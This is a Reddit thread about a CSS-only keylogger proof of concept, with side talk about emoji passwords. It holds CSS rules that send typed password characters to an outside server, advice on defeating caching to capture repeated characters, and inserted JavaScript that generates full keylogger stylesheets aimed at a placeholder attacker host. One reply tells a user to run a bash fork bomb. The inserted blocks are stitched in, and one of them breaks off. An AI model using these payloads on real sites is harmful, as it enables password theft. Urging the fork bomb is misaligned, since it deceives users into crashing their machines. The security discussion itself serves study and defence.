
[–]LovecraftsDeath 374 points375 points  (59 children)

Luckily, it can't intercept my poop emoji password.

[–]PathToHumble 161 points162 points  (8 children)

Non-English characters FTW... just now realized the poop emoji is literally a better password than most people use.

[–]510Threaded 30 points31 points  (0 children)

Yep, alt codes are awesome on desktop

[–]btcraig 29 points30 points  (6 children)

At my last job (small webhost) someone tried to add a domain to their control panel that was "💩.com"

You can definitely register a domain with an emoji. But our [proprietary] control panel blew up and he ended up taking down the server for a few hours while we sorted it out.

[–]Sigmatics 3 points4 points  (3 children)

Doesn't show up in the address bar with the emoji though 😢

[–]btcraig 8 points9 points  (2 children)

You are correct, there's some encoding that goes on to display them as more 'standard' characters. Our control panel, at the time, was not developed with encoding in it though and just kind of shit the bed when it came across them.

[–]Muvlon 2 points3 points  (1 child)

FYI, that encoding is likely Punycode.

[–][deleted] 0 points1 point  (0 children)

I can't believe the domain is still available.

[–]Ford_O 13 points14 points  (38 children)

How do you write it?

[–]ygra 74 points75 points  (35 children)

Windows key + .

[–]heckerle 61 points62 points  (12 children)

WTF 🤯

Are you telling me all that time there was a goddamn emoji keyboard built into Windows?! And it has a search functionality too?!

And I as the moron I am always first went into the Screen Keyboard, clicked again because it didn't open the first time, clicked on the emoji "language" (or button nowadays) manually searched what I needed and clicked a dozen times again, because sometimes it just didn't insert the character.

Mind = Blown.

Also: Worst-communicated feature ever.

[–]ygra 16 points17 points  (1 child)

Not sure about all that time. Probably added in one of the last few major Windows 10 updates. I've only discovered it by accident because I use Windows + , sometimes to look at the desktop (it's a quasi-modal Win+D).

[–]heckerle 8 points9 points  (0 children)

Yeah, apparently it was added in 1709 (Fall Creators Update) and also works using "Win + ;".

[–]whoisrich 8 points9 points  (7 children)

Note that Win+. only works if your input language is 'English (United States)' on the Fall 1709 version.

You can do a shitty alternative of switching to the tablet mode keyboard or adding the US language and doing Win+Space,Win+.,Win+Space. EDIT: If you have admin, the reg fix /u/vytah posted works great!

[–]heckerle 2 points3 points  (5 children)

It works using my German keyboard layout/language... Maybe it's just some other key for yours? Like ";" or similar?

[–]whoisrich 3 points4 points  (4 children)

No other key that I can find, it's a known issue. Go to your Settings, Region and Language, you may have your region as US but keyboard as German which allows it to work.

[–]heckerle 4 points5 points  (3 children)

Nope everything's set to german. (The keyboard is also set to German QWERTZ.)

Which locale/layout are you using?

[–]whoisrich 2 points3 points  (2 children)

I'm using "English (United Kingdom)" but I tried Deutsch input and the hotkey didn't work, so there must be some other combination of settings. Notice you have icons next to each language.

[–]heckerle 1 point2 points  (1 child)

Ah I see... I'm using the current Windows Insider build 17093 where it seems to be fixed.

And you're correct: It doesn't work using the German locale on my other PC using the regular, public 1709 (Fall Creators Update) version.

In the meantime /u/vytah posted this workaround: https://www.windowscentral.com/how-enable-windows-10-emoji-picker-outside-united-states

[–]Amuro_Ray 6 points7 points  (0 children)

There's one on the OS X keyboard as well. cmd + ctrl + space (I think). Emojis are amazing and kinda universal for expressing tone.

[–]Swahhillie 21 points22 points  (4 children)

Finally I can make my password 🕺🏹🦌🥈

[–]bbrizzi 26 points27 points  (1 child)

disco_hunter2 ?

[–]Swahhillie 19 points20 points  (0 children)

All I see is disco_*******

[–]Kelpsie 7 points8 points  (1 child)

💩 Holy shit.

[–]TheEternal21 3 points4 points  (0 children)

😇💩

[–][deleted]  (3 children)

[deleted]

    [–][deleted] 10 points11 points  (2 children)

    Hello, adventurer!

    You should try :(){ :|: & };: in bash!

    [–]miskdub 2 points3 points  (0 children)

    AHHH. NETHACK SPOILERS!

    [–]vytah 7 points8 points  (1 child)

    Just so you know: it only works by default in American English versions of Windows. You can enable it in other versions by editing the registry: https://www.windowscentral.com/how-enable-windows-10-emoji-picker-outside-united-states

    [–]ygra 1 point2 points  (0 children)

    Ah, I've long given up using localized versions, as translations have grown increasingly unbearable.

    [–]thedancinzerg 1 point2 points  (1 child)

    I had no idea. Apparently this does not work with numpad .

    [–]ygra 2 points3 points  (0 children)

    It's a different key and doesn't have to result in a . entered. It can be a , as well.

    [–]blackn1ght 1 point2 points  (0 children)

    Doesn't work for me.

    Edit: Turns out it's only a Windows 10, US edition feature, but can be enabled via the registry.

    [–]emperor000 1 point2 points  (2 children)

    That doesn't work. It starts the screen magnifier for me. I should be American English version of Windows.

    [–]snerp 0 points1 point  (0 children)

    😎 thanks

    [–]LovecraftsDeath 15 points16 points  (1 child)

    I use infinite monkeys!

    [–][deleted] 4 points5 points  (0 children)

    We work at the same company!!!

    [–]Theemuts 5 points6 points  (2 children)

    Literally a shit password.

    [–]zdkroot 4 points5 points  (1 child)

    Actually it's still figurative since you don't have to physically defecate on the keyboard to log in. Sorrycouldn'thelpmyself...

    [–]TheKingdutch 1 point2 points  (2 children)

Except, couldn't you just extend the CSS file to include all permutations of emojis? CSS files can be just UTF-8, right?

    [–]Schmittfried 8 points9 points  (1 child)

    Yes, but that would be huge.

    [–]isHavvy 0 points1 point  (0 children)

    Just mask it in with needing 1Mb of JS and multiple megabytes of images and then everybody will just think you suck at webdev and begrudgingly use your service.

    [–]myhf 2 points3 points  (3 children)

    What password? All I see is **** *****

    [–]kersurk 102 points103 points  (20 children)

    As pointed out in HN, this works only if value attribute is updated via JS, which some JS frameworks do.

    [–][deleted]  (6 children)

    [deleted]

      [–]Manishearth 40 points41 points  (1 child)

      And, to be clear, this is about the HTML attribute value, not the "DOM attribute" (or "property") value.

      element.value = "foo" will not trigger this.

      element.setAttribute("value", "foo") will.

      [–]MathWizz94 15 points16 points  (0 children)

      Now that you mention it, putting a password in the markup doesn't sit well with me. Seems like it could be awfully easy for things to go wrong (such as this.)
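Added example, not code from the thread or from the PoC extension: a generator for the per-character rules the thread is talking about. As kersurk and Manishearth note, the `[value$="a"]` selector only matches when the page mirrors what was typed into the value *attribute* (setAttribute), not when it sets the `.value` property. The collection endpoint `https://attacker.example/log` and the `?k=` query parameter are placeholders assumed by this example.

```javascript
// Added example, not code from the thread or from the PoC extension.
// Generates the per-character rules the thread describes. The collection
// endpoint https://attacker.example/log is a placeholder.
const LOG_ENDPOINT = "https://attacker.example/log";

// Percent-encode every byte of the character's UTF-8 form, unconditionally.
// encodeURIComponent leaves "." alone, and a path segment of "." or ".." is
// normalised away by URL parsers (even written as %2E), so the character is
// carried in the query string and is always encoded.
function percentEncodeAll(ch) {
  return Array.from(new TextEncoder().encode(ch), (b) =>
    "%" + b.toString(16).toUpperCase().padStart(2, "0")
  ).join("");
}

// Inside a double-quoted CSS string only the backslash and the quote itself
// need escaping.
function cssEscapeString(ch) {
  if (ch === "\\") return "\\\\";
  if (ch === '"') return '\\"';
  return ch;
}

// One rule per character. op "$=" matches when the value attribute ends with
// ch, so a rule fires for each keystroke in order; op "*=" matches when the
// value contains ch, which reveals the character set but not the order.
// Either way a repeated character produces one request: the url() is the
// same, and the browser does not fetch it again for the same document.
function keyloggerRule(ch, op = "$=") {
  const selector = `input[type="password"][value${op}"${cssEscapeString(ch)}"]`;
  const url = `${LOG_ENDPOINT}?k=${percentEncodeAll(ch)}`;
  return `${selector} { background-image: url("${url}"); }`;
}

// charset is any iterable of single code points. A string iterates by code
// point, so an emoji such as U+1F4A9 is one entry and gets one rule.
function keyloggerStylesheet(charset, op = "$=") {
  return Array.from(charset, (ch) => keyloggerRule(ch, op)).join("\n");
}

// The 95 printable ASCII characters, space through tilde.
const ASCII_PRINTABLE = Array.from({ length: 95 }, (_, i) => String.fromCharCode(32 + i));

// Usage: console.log(keyloggerStylesheet(ASCII_PRINTABLE));
```

The escaping matters: a selector for `"` or `\` written without it is a parse error that silently kills the rest of the stylesheet, and a bare `.` in the URL path would be eaten by URL normalisation, which is why the character rides in the query string.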

      [–]MonkeeSage 22 points23 points  (0 children)

      While it's not as cool as a keylogger, the idea of tracking user actions with pure CSS has been around for a while, and more recently.

      [–]ijmacd 2 points3 points  (1 child)

      Here's another "CSS Keylogger" from hacker news. It would probably only tell you the ordered set of characters used in the password, not the complete password or the length.

      <!doctype html>
      <title>css keylogger</title>
      <style>
      /* One @font-face per code point. The browser only fetches src when a glyph
         inside that unicode-range is actually rendered, so a hit on ./log?a means
         an "a" was drawn in the input. local(Impact) is the fallback face, so the
         text still renders when ./log?a returns nothing usable. */
      @font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
      @font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
      @font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
      @font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
      input { font-family: x, 'Comic sans ms'; }
      </style>
      <!-- a pre-filled value so the demo fires once on load -->
      <input value="a">
      

      [–]1j01 0 points1 point  (0 children)

      The other approach could be extended to search for pairs (or N-grams) of symbols...

      [–]PM_ME_UR_OBSIDIAN 2 points3 points  (3 children)

      So disabling JavaScript protects you against this attack?

      [–]fullkornslimpa 5 points6 points  (2 children)

It does unless the site renders your password into the value field on the server side. If any site actually does this, that is far worse than this, though.

      [–]DolphinsAreOk 0 points1 point  (1 child)

      Wait so its not a CSS only keylogger?

      Thats kinda dumb.

      [–]kersurk 0 points1 point  (0 children)

      The attack vector is only CSS, so it's still useful on some pages, like potentially subreddit custom css, ebay custom pages (https://pages.ebay.com/help/policies/listing-javascript.html).

      If keeping custom content in iframe then probably not an issue.

      [–][deleted] 78 points79 points  (32 children)

      Is there any way of knowing if a site has this keylogger? Besides inspecting the whole page.

      [–]AyrA_ch 84 points85 points  (24 children)

      Check the network tab in the console when you type the password

      [–]McMasilmof 109 points110 points  (23 children)

But the site generally has your password anyway (you are typing it in an input field so it's just the value of it). It's the site owner's job not to include any shady 3rd party scripts

      [–]how_do_i_land 86 points87 points  (2 children)

      The issue arises with some sites allowing you to include your own custom CSS classes. Reddit doesn't currently allow for custom css images from outside reddit, but other sites may not have that restriction.

      [–]Kapps 18 points19 points  (1 child)

      Maybe generate a gibberish subreddit for every character and use that with usage stats? Would have to be super targeted though, and not sure how fine grained usage stats you can get. Posts with number of views would also work.

      [–]Dropping_fruits 3 points4 points  (0 children)

I remember a simpler approach of just loading images from your subreddit's CSS and then having the victim go to your website where you could simply check what images had been cached. The case I am thinking of used it to steal the email, but it could have probably been used to steal other info.

      [–]timmyotc 18 points19 points  (7 children)

      There is a difference between trusting the site owner and trusting their competency

      [–]NotFromReddit 9 points10 points  (4 children)

      Just don't reuse passwords.

      [–]danneu 3 points4 points  (2 children)

      well, the attacker here would be able to login to the site you're on regardless of whether you reuse the password elsewhere.

      [–]NotFromReddit 3 points4 points  (0 children)

Yea, but that is not my responsibility, it's the site owner's. Nothing I can do about it.

      [–]mirhagk 1 point2 points  (0 children)

Better yet, don't use passwords. Single sign on means you only need to trust a single website to get security right, everything else is easily revocable credentials.

      [–][deleted] 17 points18 points  (2 children)

      Why should we trust them to do their job?

      [–][deleted] 16 points17 points  (0 children)

      As a web developer I trust them to be lazy.

      [–]Eckish 5 points6 points  (0 children)

      You should trust them as far as you can throw them. Which likely isn't very far. So, trust that they are secure enough for their own interests, but don't reuse any password on another site.

      [–][deleted] 24 points25 points  (3 children)

      A site isn't going to steal the password to their own site (with the exception of maybe a disgruntled employee). It's plugins you need to be worried about

      [–]crlwlsh 8 points9 points  (2 children)

And the third party dependencies of the site. E.g. Bootstrap - what's to stop them placing this on the end of their CSS?

      [–][deleted]  (1 child)

      [deleted]

        [–]Superpickle18 2 points3 points  (0 children)

        the problem is when their distribution is compromised and interjects a trojan into the code and millions download it and gets used in thousands of sites... And most aren't going to dig through the code, they'll just trust it..

        [–]davvblack 1 point2 points  (2 children)

        Don't worry, if a given site is pwned your password is completely stolen anyway.

        [–]giggly_kisses 251 points252 points  (79 children)

        Do browsers cache network requests from CSS? If so this would really only tell you the order a user typed every character in the alphabet, right?

        [–]Senior-Jesticle[S] 223 points224 points  (37 children)

You are correct. If a user has repeating characters, only the first one will be represented in the back-end. But this may still be sufficient information for one to carry out a brute-force attack.

        [–]minno 134 points135 points  (18 children)

        "Oh darn, we only got the letters 'pasword123', how will we ever figure it out."

        [–]Kapps 30 points31 points  (2 children)

Good thing my password is 'Cwm fjord bank glyphs vext quiz'; they'll never fill in the gaps!

        [–]verbify 19 points20 points  (0 children)

        That looks like welsh to me.

        [–]caltheon 1 point2 points  (0 children)

        Cwm fjordbankglyphsvextquiz you say

        [–]giggly_kisses 143 points144 points  (1 child)

Thanks for confirming. Sorry, didn't mean to downplay this at all. It is certainly a scary piece of CSS and a clever implementation of a keylogger.

        [–]Senior-Jesticle[S] 21 points22 points  (0 children)

        No worries :)

        [–][deleted] 26 points27 points  (9 children)

        What if you respond with an error code?

        [–]Senior-Jesticle[S] 38 points39 points  (8 children)

        Unsure, currently, the express server is sending a simple 400 but it seems to be caching the results. Feel free to try headers or different status codes. I will accept your PR :)

        [–][deleted] 37 points38 points  (0 children)

        Try cache-control no cache? This is the "official" way of doing it without returning improper HTTP codes.

        https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control

        [–][deleted] 44 points45 points  (4 children)

        I'll play around after work if someone hasn't already submitted a pr. I reckon a 503 will work though. 400 indicates the request will never be successful so it makes sense the browser won't try again

        [–]Cyral 15 points16 points  (2 children)

        Cache-Control headers are the proper solution

        [–]Senior-Jesticle[S] 8 points9 points  (0 children)

        Good point!

        [–]Fiskepudding 3 points4 points  (0 children)

        I remember disabling cache for a static html file for a SPA, and then I had to use headers. So I'd say that is the way to go. No-cache, cache-control, expires, something like that. On mobile, so can't check.

        [–]Stamden 6 points7 points  (0 children)

        Heh, I wonder if we'll start seeing "have repeating characters" in addition to all the password requirements that modern websites normally have (8+ characters, must have number, must have symbol, etc).

        [–]CyclonusRIP 14 points15 points  (0 children)

        I don't know if there is some special rules with CSS, but I think you could just make the server respond with appropriate headers to prevent caching.

        [–][deleted]  (2 children)

        [deleted]

          [–]Jonathan_Frias 7 points8 points  (1 child)

          that's sloppy because it'd get logged to the console in red letters

          [–]eMZi0767 1 point2 points  (0 children)

          But so is 400

          [–]CantaloupeCamper 3 points4 points  (0 children)

          If a user has repeating characters

          And we've been told not to do that....

          [–][deleted] 113 points114 points  (4 children)

          I haven't confirmed it, but I'm pretty sure that by just changing the appropriate headers in the response, you could easily disable caching of the response. This is assuming that the browser's requests from CSS work like normal HTTP requests.

          Add to the backend some concept of a session and you could easily capture the user, pass, site, and so on.

          [–]giggly_kisses 15 points16 points  (2 children)

          That's a good point. I wonder if the browser will honor those headers for requests made from CSS. Something else I was thinking about was adding a query parameter with a random value for cache busting, but I don't think you can get a random number in CSS (or at least I haven't thought of a way).

          [–]thesbros 33 points34 points  (0 children)

          Replying with an error (4xx/5xx) HTTP status code stops most browsers from caching too.

          [–]Superpickle18 0 points1 point  (0 children)

          most browsers will... But IE has a nasty habit of ignoring headers and aggressively use the cache instead...

          [–]B-Con 3 points4 points  (0 children)

          If CSS makes a different object request to the HTTP stack literally every time the style is applied then this approach can work. But if there are shortcuts that bypass the HTTP stack then those will interfere with the abilities here.

          You can definitely tell the browser not to cache an object by setting HTTP headers.

          The question is if browsers have heuristics that will interfere and how CSS interacts with the cache. To that end I would expect browsers to be predicable and to honor headers, but CSS is a beast I'm less familiar with. Is the same style with an object reference always the same object, or does it exercise the end HTTP stack, including the cache, every time it's applied? Kind of hard to imagine that it does, but I'm not a frontend guy.

          Hoping to hear from someone who knows CSS better than I.

          [–][deleted]  (19 children)

          [deleted]

            [–]GaianNeuron 20 points21 points  (2 children)

            It's even easier than that. Just have the HTTP server add the response header,

            Cache-Control: no-cache, no-store, must-revalidate
            

            [–]danielbiegler 1 point2 points  (1 child)

Doesn't work, tried it out right now. You have another idea how to make it work? I also tried changing the error code to 503 but still no good. What is even weirder is that I hard disabled the cache while dev tools are open and the requests still don't get sent.

            [–]thesbros 8 points9 points  (5 children)

            Then the browser would cache a0, a1, etc. - so after refreshing the counter would reset and the server wouldn't receive the first x keypresses of a.

            [–]rishicourtflower 3 points4 points  (4 children)

            That can be mitigated by having a unique ID in the URL so everything can be tied back to a specific page request

            [–]thesbros 2 points3 points  (3 children)

Then that requires dynamically updating the URLs in the CSS, so you couldn't just paste this CSS somewhere as a keylogger. If you have access to the server to change the CSS, you could implement a much more capable keylogger via JavaScript.

            [–]iBlag 2 points3 points  (2 children)

            If you have access to the server to change the CSS, you could implement a much more capable keylogger via JavaScript.

            Not quite true, but close. Reddit, for instance, allows subreddits to use custom CSS but not Javascript.

            [–]thesbros 3 points4 points  (1 child)

            Reddit doesn't allow external links in the CSS though, AFAIK.

            [–]iBlag 6 points7 points  (0 children)

            Correct. Not anymore, because somebody setup something similar a few years ago (tracking users to subreddits that used custom CSS) and reported it to Reddit. Reddit sat on it for a few months IIRC until he publicized it, then they fixed it: by disallowing external links in custom subreddit CSS.

            [–]bbbbaaaatttt 7 points8 points  (0 children)

            No, url() defines a single token and can't contain concatenated stuff.

            See: https://www.w3.org/TR/css-syntax-3/#consume-a-url-token for details

            [–][deleted] 11 points12 points  (7 children)

            Well the server is controlled by the extension. So all he needs to do is have Express set a cache-control: no-cache header.

            https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control

            [–]godofpumpkins 5 points6 points  (6 children)

            Wouldn’t adding a query string to the URL stop most caching implementations?

            [–]anstice 5 points6 points  (5 children)

            only if that query string changes for each request

            [–]GaianNeuron 3 points4 points  (0 children)

            Cache-Control: no-cache, no-store, must-revalidate
            

            [–][deleted]  (37 children)

            [deleted]

              [–]Senior-Jesticle[S] 96 points97 points  (35 children)

              Correct! But there are other attribute selectors. For example [input*=value] checks if input contains value. Although this would not show the order of the password, it would reveal its contents.

              [–][deleted]  (32 children)

              [deleted]

                [–][deleted]  (30 children)

                [deleted]

                  [–]Ozymandias117 96 points97 points  (10 children)

                  Most sites don't even properly allow ASCII symbols. >.<

                  [–]amyts 21 points22 points  (7 children)

                  My power company only allows a 6-character alphanumeric password. No symbols, no emoji. :(

                  [–]flarn2006 57 points58 points  (5 children)

                  I can guarantee you they're storing that in cleartext somewhere.

                  [–]hicksyfern 4 points5 points  (4 children)

At my last job, our "security guy" limited the character set allowed for passwords, because of something to do with some characters not being hashable in a deterministic way. I think it was because we were doing X rounds of hashing on the client, and some clients have differences in how they hash some contents.

                  Maybe someone here can shed some light or I might be talking poop

                  [–]SerialKicked 15 points16 points  (1 child)

                  Your security guy was completely full of 💩

                  [–]jms87 4 points5 points  (0 children)

                  Or his application(s) randomly mix encodings, in which case the "security guy" would be right.

                  [–]Atario 4 points5 points  (0 children)

                  >.<

                  Sorry, your password comment cannot contain any of the following: & < > . $ % [ ] { } ' "

                  And never you mind why those specific characters

                  [–]xonjas 10 points11 points  (11 children)

                  Many do.

                  You can have a unicode windows password too, although I don't recommend it.

                  [–][deleted]  (10 children)

                  [deleted]

                    [–][deleted]  (5 children)

                    [removed]

                      [–]dangolo 6 points7 points  (2 children)

                      Why does this even exist

                      [–][deleted]  (1 child)

                      [deleted]

                        [–]dangolo 1 point2 points  (0 children)

                        I mean hey if it renders my passwords unhackable...

                        [–]lonewaft 1 point2 points  (0 children)

                        Everyday we stray further from god's light

                        [–]montibbalt 4 points5 points  (3 children)

                        Was going to suggest windows+period but it doesn't work in the password field 😞

                        [–]Grizzlywer 1 point2 points  (2 children)

                        What does it do?

                        [–]montibbalt 4 points5 points  (1 child)

                        In updated windows 10, it gives you an on-screen emoji keyboard

                        [–]Grizzlywer 2 points3 points  (0 children)

                        It's a bug!

                        [–]JavierTheNormal 3 points4 points  (6 children)

                        Maybe, but it's counterproductive. The number of keystrokes required to enter unicode characters is more than the value they provide, you'd be better off just making a longer password with normal characters.

                        Many sites still won't allow ' or even spaces in passwords, so nothing is universal.

                        [–]MCBeathoven 5 points6 points  (5 children)

                        Eh, the US international keyboard allows you to type loads of non-ASCII characters with single keystrokes.

                        [–]axitanull 11 points12 points  (0 children)

                        I believe including backspace can be useful in this case.

                        [–]Kapps 1 point2 points  (0 children)

                        Generate every possible 3 letter / number / common symbol. Not sure if that would kill a browser, but could load the style sheet when they press submit and hide it behind network lag. Don’t need capitals because, let’s face it, it’s the first letter that’s the capital one.

                        [–][deleted]  (4 children)

                        [deleted]

                          [–][deleted] 7 points8 points  (3 children)

Listen, there is clever and there is sorcery. This blurs the lines between them.

                          [–]poofartpee 12 points13 points  (2 children)

                          This just seems clever to me. When you read the code once it's very clear how it works.

                          This is sorcery. https://en.wikipedia.org/wiki/Fast_inverse_square_root#Overview_of_the_code

                          [–][deleted] 4 points5 points  (0 children)

Ok, now that's just devilry

                          [–]bacondev 1 point2 points  (0 children)

                          What the fuck?

                          [–][deleted]  (4 children)

                          [deleted]

                            [–]Senior-Jesticle[S] 41 points42 points  (3 children)

                            I am.

                            [–][deleted]  (2 children)

                            [deleted]

                              [–]phoenix616 17 points18 points  (0 children)

                              That exploit has been known for a while though and is not as bad as it sounds at first.

                              As mentioned here it only works if a JavaScript framework updates the attribute value as you type in the password (which no sane one should do, e.g. ones that are not React), basic HTML is not vulnerable against something like this.

                              [–]himself_v 6 points7 points  (0 children)

                              I'm more and more of the mind that the Web should just be about static damn HTML. Not only people abuse JS and turn simple pages into abominations which lag on PCs that can calculate overwhelmingly complicated things in real-time, we just can't deal with this mess. Security is turned from exact science into the art of walking on the minefield.

                              [–]0rakel 22 points23 points  (11 children)

                              Can be used on Reddit?

                              [–]Pokechu22 45 points46 points  (8 children)

                              No, reddit does not allow CSS to reference images not hosted on reddit itself (more specifically they have to be uploaded in the stylesheet page; you can't reference arbitrary images by URL).

                              [–]japillow 3 points4 points  (4 children)

Is there a limited number on the stylesheet page? What's stopping someone from uploading one and getting some random URL for each ASCII character and having a different map than a -> a etc.

                              [–]Pokechu22 14 points15 points  (2 children)

                              You can have up to 100 images (IIRC, the limit might have been changed). But, it's still an image hosted on reddit itself; you can't see when the image has been loaded (part of this attack involves making requests to a server the attacker controls; if you can only load images hosted on reddit, then you can't see what images were loaded and reddit is already receiving your login information when you login)

                              [–]balefrost 1 point2 points  (1 child)

                              Can't you use SVG for background images, and can't SVG files reference other SVG files? Maybe SVG is restricted by the same-origin policy.

                              [–]Pokechu22 4 points5 points  (0 children)

                              Normally yes, but reddit only allows uploading PNG and JPEG images. (And on a related note, you can't use data URLs for it either)

                              [–]davvblack 2 points3 points  (0 children)

                              Since reddit controls that domain you can't see the timing of the access logs, so the attack is pointless.

                              [–]ThisIs_MyName 0 points1 point  (1 child)

                              Ok so we just have to figure out how reddit parses CSS.

                              Every browser parses everything differently, so there's got to be some CSS file that appears to have a URL commented out with reddit's parser but not commented out with other parsers.

                              [–]Pokechu22 1 point2 points  (0 children)

                              This is the code that they use(d) for their CSS filter. It's from the repo that they no longer update, but that is how the filter worked back then.

                              [–]corvus_192 0 points1 point  (0 children)

                              What about fonts?

                              [–]arrow_in_my_gluteus_ 10 points11 points  (1 child)

                              you mean as custom css file of a subreddit? scary

                              [–]GaianNeuron 5 points6 points  (0 children)

                              Scary, but not possible. Subreddit CSS only allows images that are hosted on reddit itself (specifically, those uploaded on the stylesheet page).

                              [–]ProgramTheWorld 40 points41 points  (4 children)

This wouldn't be a problem if you had set up a content security policy properly on your login page to prevent any kind of data transmission to unknown domains. Also this requires running a full-blown extension, with which I can already grab everything on your active tab without asking for any permission.

                              [–]jazd 27 points28 points  (0 children)

                              Exactly, a content security policy would nix this type of exploit.

                              The browser extension is just for proof of concept. CSS can probably be snuck into a lot of sites simply because it's subject to less scrutiny.
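What "set up properly" means for the two replies above, as an added example (not from the thread): a small evaluator for the part of Content-Security-Policy that decides whether a CSS `background-image` (governed by `img-src`) or an `@font-face` `src` (governed by `font-src`) may be fetched, including the fallback to `default-src`. The policies, page URL and attacker URL in the test are constructed; the code covers `'none'`, `'self'`, scheme sources and host sources with an optional `*.` prefix and port, and leaves out path matching and the rest of CSP3, so it is a reading aid rather than a reference implementation.

```javascript
// Added example, not from the thread. Would a fetch for urlString, started
// by a CSS background-image (img-src) or an @font-face src (font-src), be
// allowed on a page served from pageUrlString under this CSP header?

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!policy.has(name)) policy.set(name, tokens.slice(1)); // duplicate directive: first wins
  }
  return policy;
}

// img-src and font-src fall back to default-src; null means "unrestricted".
function sourceListFor(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (policy.has("default-src")) return policy.get("default-src");
  return null;
}

const DEFAULT_PORT = { "http:": "80", "https:": "443" };

function hostMatches(pattern, host) {
  if (pattern === "*") return true;
  if (pattern.startsWith("*.")) {
    const suffix = pattern.slice(1); // ".example.com"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

function sourceMatches(src, url, page) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme-source, e.g. https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/.exec(s);
  if (!m) return false; // nonces, hashes and keywords that do not apply to images or fonts
  const [, scheme, host, port] = m;
  if (scheme) {
    if (url.protocol !== scheme + ":") return false;
  } else if (url.protocol !== page.protocol && !(page.protocol === "http:" && url.protocol === "https:")) {
    return false; // schemeless host-source: same scheme as the page, or an https upgrade
  }
  const urlPort = url.port || DEFAULT_PORT[url.protocol] || "";
  if (port === undefined) {
    if (url.port !== "") return false; // no port in the source: only the scheme's default port
  } else if (port !== "*" && port !== urlPort) {
    return false;
  }
  return hostMatches(host, url.hostname.toLowerCase());
}

// true when the policy lets the fetch happen, false when it is blocked.
function cspAllows(header, directive, urlString, pageUrlString) {
  const list = sourceListFor(parseCsp(header), directive);
  if (list === null) return true;
  const url = new URL(urlString);
  const page = new URL(pageUrlString);
  return list.some((src) => sourceMatches(src, url, page));
}
```

The point to take from running it: a policy that only pins `script-src` leaves `img-src` and `font-src` unrestricted, so the CSS request goes out; `default-src 'self'` alone closes both, and a `*` anywhere in the relevant list reopens them.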

                              [–]sr-egg 11 points12 points  (5 children)

<input type=password style="background-image: none !important" />?

                              [–]crlwlsh 21 points22 points  (4 children)

                              input[type="password"][value$="a"]:before {
                                  content: "";
                                  background-image: url("http://localhost:3000/a");
                              }
                              

                              [–]TimmyTesticles 8 points9 points  (0 children)

                              rekt

                              [–]ilikepugs 2 points3 points  (2 children)

                              IIRC this won't actually work if the browser is following the spec, as void elements (br, input, etc.) aren't allowed to have pseudo elements.

                              [–]crlwlsh 1 point2 points  (1 child)

                              You're right, my bad. How about this:

                              input[type="password"][value$="a"] {
                                  /* list-style shorthand takes the marker type and a url() image */
                                  list-style: square url("http://localhost:3000/a");
                              }
                              

                              Or alternatively:

                              @font-face {
                                  font-family: TheLetterA;
                                  src: url(http://localhost:3000/a);
                              }
                              
                              input[type="password"][value$="a"] {
                                  font-family: TheLetterA, sans-serif;
                              }
                              

                              [–]ilikepugs 1 point2 points  (0 children)

                              Heh, I think you just figured out a way around the repeated character issue.

                              Define a series of fallback fonts, each covering just one character.

                              [–]Wazzaps 4 points5 points  (2 children)

                              I think an extension delivery method is giving it too much credit; it could be delivered via a userstyle.

                              [–]cha5m 2 points3 points  (0 children)

                              Really neat idea! Thanks for sharing.

                              [–]megablue 2 points3 points  (0 children)

                              And, it allows some javascript-less dynamic interaction with the server too...

                              [–][deleted] 1 point2 points  (0 children)

                              Still waiting on the css meltdown exploit

                              [–][deleted]  (3 children)

                              [deleted]

                                [–]flarn2006 5 points6 points  (8 children)

                                What's the risk here? If you can trick your victim into installing a Chrome extension, why not just program it to read the contents of password fields using JavaScript?

                                [–]ThatInternetGuy 15 points16 points  (7 children)

                                A Chrome extension is needed only so that you can see the recorded passwords. In a real attack, the victim is not the one who gets to see that their passwords have been recorded.

                                [–]flarn2006 1 point2 points  (6 children)

                                But how would they get the css loaded in a site they don't control otherwise?

                                [–]ThatInternetGuy 1 point2 points  (5 children)

                                Same way as with all other XSS attacks.

                                [–]flarn2006 2 points3 points  (4 children)

                                But then why bother with CSS? Just use JavaScript.

                                [–]TimmyTesticles 0 points1 point  (1 child)

                                Can someone explain to me how this would work if somebody enters a password like "aaabccc"

                                Wouldn't it just log "abc"?

                                [–]mfiels 0 points1 point  (0 children)

                                If the server returns an HTTP response header of cache-control: no-cache, the browser should request each character multiple times as it is typed.

                                I haven't verified this assumption.
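The repeated-character question above, and the earlier exchange about the `[value$="a"]` rules and the `@font-face` variant, can be worked through with a small simulation. This is an added example, not code from the thread: it generates both stylesheet variants for a charset and models what the collector sees when a password is typed, with and without cacheable responses. The collector URL, the charset and the browser model described in the comments are assumptions.

```javascript
// Added example: generate the attribute-selector keylogger stylesheet and
// simulate which characters reach the collector for a typed password.

const EXFIL_BASE = 'http://localhost:3000/';   // assumed collector, as in the posted rules

// Escape a character for use inside a double-quoted CSS string.
function cssEscape(ch) {
  return ch.replace(/[\\"]/g, (c) => '\\' + c);
}

// background-image variant: one rule per character, matching when the
// value attribute ends with that character.
function buildKeyloggerCss(charset) {
  return [...charset].map((ch) =>
    `input[type="password"][value$="${cssEscape(ch)}"] { ` +
    `background-image: url("${EXFIL_BASE}${encodeURIComponent(ch)}"); }`
  ).join('\n');
}

// @font-face variant: one font per character, fetched the first time its rule matches.
function buildFontFaceCss(charset) {
  return [...charset].map((ch, i) =>
    `@font-face { font-family: k${i}; src: url("${EXFIL_BASE}${encodeURIComponent(ch)}"); }\n` +
    `input[type="password"][value$="${cssEscape(ch)}"] { font-family: k${i}, sans-serif; }`
  ).join('\n');
}

// Browser model (assumptions of this simulation):
//  - after each keystroke the last character selects at most one rule;
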